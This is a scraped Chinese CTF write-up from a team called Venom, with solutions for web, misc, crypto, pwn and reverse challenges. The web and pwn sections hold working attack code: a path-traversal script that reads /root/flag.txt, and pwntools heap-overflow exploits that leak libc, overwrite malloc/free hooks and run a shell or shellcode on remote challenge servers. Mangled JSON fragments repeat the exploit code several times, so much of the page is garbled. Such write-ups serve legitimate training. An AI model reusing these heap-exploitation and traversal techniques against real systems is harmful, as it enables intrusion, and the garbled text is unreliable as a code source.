38kkk(38kkkcom)
一直打CTF一直爽~
.jpg)
恭喜Venom在本次比赛中获得第四名的好成绩!(团队收人,能熬的那种~)WebGame解题思路post /score.phpscore=15就会有 flag$.ajax({url: score.php,
type: POST,data: score=+15,success: function(data){var data = data; $("#output").text(data);
} })who_are_you?解题思路
&xxe;/proc/self/fd/2
file读不到,用php filter读flag在 index.php注释部分 show_me_your_image 解题思路import stringimport requests as reqimport
base64import urllib·z = {0: Y, 2: P, 4: y, 6: e, 8: v, B: z, D: N, F: t, H: x, J: U, L: X, N: F, P:
V, R: q, T: a, V: l, X: m, Z: S, b: 4, d: B, f: h, h: 5, j: c, l: M, n: 9, p: w, r: 1, t: 8, v: o, x:
i, z: K,+: u, /: A, 1: 0, 3: C, 5: T, 7: I, 9: k, A: b, C: J, G: 7, I: f, K: 6, M: Z, O: 2, Q: +, S:
d, U: 3, W: R, Y: W, a: L, c: r, e: g, g: n, i: E, k: j, m: G, o: H, q: Q, s: p, u: s, w: O, y: D, E:
\\}b64table = string.maketrans( .join(z.keys()), .join([z[k] for k in z.keys()]))b64table2 = string.maketrans(
.join([z[k] for k in z.keys()]), .join(z.keys()))URL = http://3fc6a707471d4c83959773ac33db4ec348f07f0fa23e4e15.changame.ichunqiu.com/img.php?name={}
defget(pl): pl = base64.b64encode(pl)print"[+] Normal Base64 :", pl pl = pl.translate(b64table2)
print"[+] Encode Base64 :", pl pl = urllib.quote(pl) res = req.get(URL.format(pl)) print(res.content)
deftest(pl): pl = pl.translate(b64table) pl = base64.b64decode(pl)print plif __name__ == __main__
: get("../../../../../../proc/self/cwd/templates/upload.html") get("../../../../../../root/flag.txt"
)
MISC签到题解题思路dig txt gamectf.comgamectf.com. 600 IN TXT "flag{welcome_TXT}"
24words 解题思路
CodeValuesdd if=24w.png of=1.zip skip=22838 bs=17z x 1.zip解压出图片后转黑白,扫描二维码即得flagflag{24_word_m4n7ra}七代目
解题思路修复文件头GIF8po叔说有的帧有问题一帧一帧save后查看,在7/66帧找到flag:
亚萨西 解题思路下载之后爆破zip密码,爆破出来为loli解压之后把图片拖到16进制编辑器,在尾部不发现Ook编码,解码就行了flag{f71d6bca-3210-4a31-9feb-1768a65a33db}
CryptSM4解题思路from pysm4 import encrypt, decryptkey=[13, 204, 99, 177, 254, 41, 198, 163, 201, 226, 56,
214, 192, 194, 98, 104]c=[46, 48, 220, 156, 184, 218, 57, 13, 246, 91, 1, 63, 60, 67, 105, 64, 149, 240
, 217, 77, 107, 49, 222, 61, 155, 225, 231, 196, 167, 121, 9, 16, 60, 182, 65, 101, 39, 253, 250, 224
, 9, 204, 154, 122, 206, 43, 97, 59]key=.join(map(chr,key)).encode(hex)c=.join(map(chr,c)).encode(hex
)print(key,c)flag=for i in range(3): flag+=(hex(decrypt(int(c[i*32:i*32+32],16), int(key,16)))[2:-1].decode(
hex))print(flag)dp解题思路from sympy import *from sympy.core.numbers import igcdexe=65537n=9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
dp=81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
c=5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827
p = gcd(n, pow(2, e*dp, n) - 2)q = n // pd = long(igcdex(e, (p-1) * (q-1))[0]%n)print(hex(pow(c,d,n))[2:-1].decode(hex))
flag{c3009b61-f9ed-4b20-8855-edab53e89530}PWN>> \",\"1\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(size))"],[20,"\n","36:0"],[20," p.sendafter(\": \",note)"],[20,"\n","36:0"],[20,"def show(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"2\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20," p.recvuntil(\": \")"],[20,"\n","36:0"],[20," return p.recvuntil(\"\\n\").strip()"],[20,"\n","36:0"],[20,"def delete(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"3\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20,"def strcat(index1,index2):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"4\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index1))"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index2))"],[20,"\n","36:0"],[20,"def fake(a):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"5\")"],[20,"\n","36:0"],[20," s=\"\""],[20,"\n","36:0"],[20," for i in a:"],[20,"\n","36:0"],[20," s+=str(i)+\" \""],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",s[:-1])"],[20,"\n","36:0"],[20,"#p=process(\"./pwn\")"],[20,"\n","36:0"],[20,"p=remote(\"a32f094e35d7.gamectf.com\",20001)"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x400,\"a\"*0x3ff+\"\\n\")#1"],[20,"\n","36:0"],[20,"add(0x28,\"b\"*9+p64(0xb1)+\"\\n\")#2"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"add(0x400,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#3"],[20,"\n","36:0"],[20,"add(0x80,\"kirin\\n\")"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"fake([1,2])"],[20,"\n","36:0"],[20,"delete(3)"],[20,"\n","36:0"],[20,"add(0x18,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"libc_addr=u64(show(4)+\"\\x00\\x00\")"],[20,"\n","36:0"],[20,"print hex(libc_addr)"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"delete(4)"],[20,"\n","36:0"],[20,"delete(6)"],[20,"\n","36:0"],[20,"delete(5)"],[20,"\n","36:0"],[20,"hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"\\x00\"*0x13+p64(libc_addr+0x7ffff7a10000-0x00007ffff7dd1b58+0xf2519)+\"\\n\")"],[20,"\n","36:0"],[20,"#gdb.attach(p)"],[20,"\n","36:0"],[20,"p.interactive()"],[20,"\n","36:0"]]">
one_string 解题思路edit过程中根据strlen更新长度,存在堆溢出而后程序有rwx段,更改free_hook到&shellcode即可from pwn import *context.log_level=
"debug"defadd(l,note):#p.sendline("1")global s#p.sendline(str(l))#p.send(note) s+="1\n"+str(l)+"\n"+note
defdelete(index):global s#p.sendline("2")#p.sendline(str(index)) s+="2\n"+str(index)+"\n"defedit(index,note)
:global s#p.sendline("3")#p.sendline(str(index))#p.send(note) s+="3\n"+str(index)+"\n"+note#p=process("./pwn")
p=remote("df0a72047d6c.gamectf.com",10001)p.sendlineafter("Please input you token:\n","icq95702d8b2edd7591a517869c3f12f"
)s=""add(0x34,"a"*0x34)add(0x34,"a"*0x34)add(0x34,"a\n")edit(0,"b"*0x34)edit(0,"c"*0x34+"\x71")delete(
1)add(0x34,"a"*0x34)add(0x34,"a"*0x34)add(0x38,"a"*0x38)delete(2)edit(3,p32(0x80EBA0c)+"\n")add(0x34,
"a"*0x34)add(0x34,p32(0xf0)+"\n")edit(5,p32(0xa0)+p32(0x080EB4F0)*15+p32(0x080EB4F0)+asm(shellcraft.cat(
"/flag"))+"\n")edit(0,p32(0x80eba58)+"\n")delete(5)#gdb.attach(p)p.sendline(s.encode("base64").replace(
"\n",""))p.interactive()>> \",\"1\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(size))"],[20,"\n","36:0"],[20," p.sendafter(\": \",note)"],[20,"\n","36:0"],[20,"def show(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"2\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20," p.recvuntil(\": \")"],[20,"\n","36:0"],[20," return p.recvuntil(\"\\n\").strip()"],[20,"\n","36:0"],[20,"def delete(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"3\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20,"def strcat(index1,index2):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"4\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index1))"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index2))"],[20,"\n","36:0"],[20,"def fake(a):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"5\")"],[20,"\n","36:0"],[20," s=\"\""],[20,"\n","36:0"],[20," for i in a:"],[20,"\n","36:0"],[20," s+=str(i)+\" \""],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",s[:-1])"],[20,"\n","36:0"],[20,"#p=process(\"./pwn\")"],[20,"\n","36:0"],[20,"p=remote(\"a32f094e35d7.gamectf.com\",20001)"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x400,\"a\"*0x3ff+\"\\n\")#1"],[20,"\n","36:0"],[20,"add(0x28,\"b\"*9+p64(0xb1)+\"\\n\")#2"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"add(0x400,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#3"],[20,"\n","36:0"],[20,"add(0x80,\"kirin\\n\")"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"fake([1,2])"],[20,"\n","36:0"],[20,"delete(3)"],[20,"\n","36:0"],[20,"add(0x18,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"libc_addr=u64(show(4)+\"\\x00\\x00\")"],[20,"\n","36:0"],[20,"print hex(libc_addr)"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"delete(4)"],[20,"\n","36:0"],[20,"delete(6)"],[20,"\n","36:0"],[20,"delete(5)"],[20,"\n","36:0"],[20,"hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"\\x00\"*0x13+p64(libc_addr+0x7ffff7a10000-0x00007ffff7dd1b58+0xf2519)+\"\\n\")"],[20,"\n","36:0"],[20,"#gdb.attach(p)"],[20,"\n","36:0"],[20,"p.interactive()"],[20,"\n","36:0"]]">
two string>> \",\"1\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(size))"],[20,"\n","36:0"],[20," p.sendafter(\": \",note)"],[20,"\n","36:0"],[20,"def show(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"2\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20," p.recvuntil(\": \")"],[20,"\n","36:0"],[20," return p.recvuntil(\"\\n\").strip()"],[20,"\n","36:0"],[20,"def delete(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"3\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20,"def strcat(index1,index2):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"4\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index1))"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index2))"],[20,"\n","36:0"],[20,"def fake(a):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"5\")"],[20,"\n","36:0"],[20," s=\"\""],[20,"\n","36:0"],[20," for i in a:"],[20,"\n","36:0"],[20," s+=str(i)+\" \""],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",s[:-1])"],[20,"\n","36:0"],[20,"#p=process(\"./pwn\")"],[20,"\n","36:0"],[20,"p=remote(\"a32f094e35d7.gamectf.com\",20001)"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x400,\"a\"*0x3ff+\"\\n\")#1"],[20,"\n","36:0"],[20,"add(0x28,\"b\"*9+p64(0xb1)+\"\\n\")#2"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"add(0x400,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#3"],[20,"\n","36:0"],[20,"add(0x80,\"kirin\\n\")"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"fake([1,2])"],[20,"\n","36:0"],[20,"delete(3)"],[20,"\n","36:0"],[20,"add(0x18,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"libc_addr=u64(show(4)+\"\\x00\\x00\")"],[20,"\n","36:0"],[20,"print hex(libc_addr)"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"delete(4)"],[20,"\n","36:0"],[20,"delete(6)"],[20,"\n","36:0"],[20,"delete(5)"],[20,"\n","36:0"],[20,"hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"\\x00\"*0x13+p64(libc_addr+0x7ffff7a10000-0x00007ffff7dd1b58+0xf2519)+\"\\n\")"],[20,"\n","36:0"],[20,"#gdb.attach(p)"],[20,"\n","36:0"],[20,"p.interactive()"],[20,"\n","36:0"]]" style="color: rgb(73, 73, 73); font-size: 18px; text-align: left;">解题思路
多个字符串strcat时长度判断存在逻辑错误可以绕过0x400的检测造成strcat时堆溢出而后利用堆溢构造堆重叠,leak libc并修改malloc hook即可改至one_target即可get shell:
from pwn import *context.log_level="debug"defadd(size,note): p.sendlineafter(">>> ","1") p.sendlineafter(
" : ",str(size)) p.sendafter(": ",note)defshow(index): p.sendlineafter(">>> ","2") p.sendlineafter(
" : ",str(index)) p.recvuntil(": ")return p.recvuntil("\n").strip()defdelete(index): p.sendlineafter(
">>> ","3") p.sendlineafter(" : ",str(index))defstrcat(index1,index2): p.sendlineafter(">>> ","4"
) p.sendlineafter(" : ",str(index1)) p.sendlineafter(" : ",str(index2))deffake(a): p.sendlineafter(
">>> ","5") s=""for i in a: s+=str(i)+" " p.sendlineafter(" : ",s[:-1])#p=process("./pwn")p=remote(
"a32f094e35d7.gamectf.com",20001)add(0x18,"kirin\n")#0add(0x400,"a"*0x3ff+"\n")#1add(0x28,"b"*9+p64(0xb1
)+"\n")#2delete(0)add(0x400,"kirin\n")#0add(0x18,"kirin\n")#3add(0x80,"kirin\n")delete(0)fake([1,2])delete(
3)add(0x18,"aaaa\n")libc_addr=u64(show(4)+"\x00\x00")print hex(libc_addr)add(0x68,"bbbb\n")add(0x68,"bbbb\n"
)delete(4)delete(6)delete(5)hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0add(0x68,p64(hook-0x23)+
"\n")add(0x68,p64(hook-0x23)+"\n")add(0x68,"aaaa\n")add(0x68,"\x00"*0x13+p64(libc_addr+0x7ffff7a10000
-0x00007ffff7dd1b58+0xf2519)+"\n")#gdb.attach(p)p.interactive()Reversesrc_leak解题思路deffunc2(s): k=0
for i in range(10000):if s==0:break k+=s%2 s=s/2return kdeffunc3(s):return s%2print func3(func2(
1))def func1(n,l,r):if l==r:return l mid=(l+r+1)/2if(n
func1(n,mid,r)def_func1(s):return func1(s,1,s)print _func1(10)defNEXTM(n,m):if(m*m<=n):return m+1else
:return0defNEXTN(n,m):return (n%m!=0)*ndefTEST(n,m):if(n==0):return0if(m==0):return1return TEST(NEXTN(n,m),NEXTM(n,m))
deffunc4(n):return TEST(n,2)z=[963,4396,6666,1999,3141]for j in z:for i in range(1,100000000):if(_func1(i)==j
and func3(func2(i))==1):print ibreakkkk=0+1for i in range(3,10001): kkk+=func4(i)print kkkflag{927369
-19324816-44435556-3996001-9865881-1229}直接拿python 实现一遍 然后爆破flat解题思路key1 =[0x4A, 0x32, 0x32, 0x36, 0x31,
0x43, 0x36, 0x33, 0x2D, 0x33, 0x49, 0x32, 0x49, 0x2D, 0x45, 0x47, 0x45, 0x34, 0x2D, 0x49, 0x42, 0x43, 0x43, 0x2D, 0x49,
0x45, 0x34, 0x31, 0x41, 0x35, 0x49, 0x35, 0x46, 0x34, 0x48, 0x42]len11=42head="flag{"weiba="}"
num="0123456789"chrss="abcdefghijklmnopqrstuvwxyz"xiahu=[13,18,23,28]s=bytearray(36*:)for i in range(len(key1)):
if(key1[i]==0x2d): s[i]=0x2d for f in chrss: if ord(f)-0x30==key1[i]: s[i]=ord(f)
for f in num: if ord(f)+17==key1[i]: s[i]=ord(f)print s#flag{9bbfa2fc-c8b8-464d-8122-84da0e8e5d71}
check1 2 3 4 表明字符串长度 头 尾 下划线的位置check5 判断长度 对每个字符处理 然后对照表因为格式是uuid 所以就变成了一个解了
招新小广告ChaMd5 ctf组 长期招新尤其是crypto+reverse+pwn+合约的大佬欢迎联系admin@chamd5.org
免责声明:本站所有信息均搜集自互联网,并不代表本站观点,本站不对其真实合法性负责。如有信息侵犯了您的权益,请告知,本站将立刻处理。联系QQ:1640731186
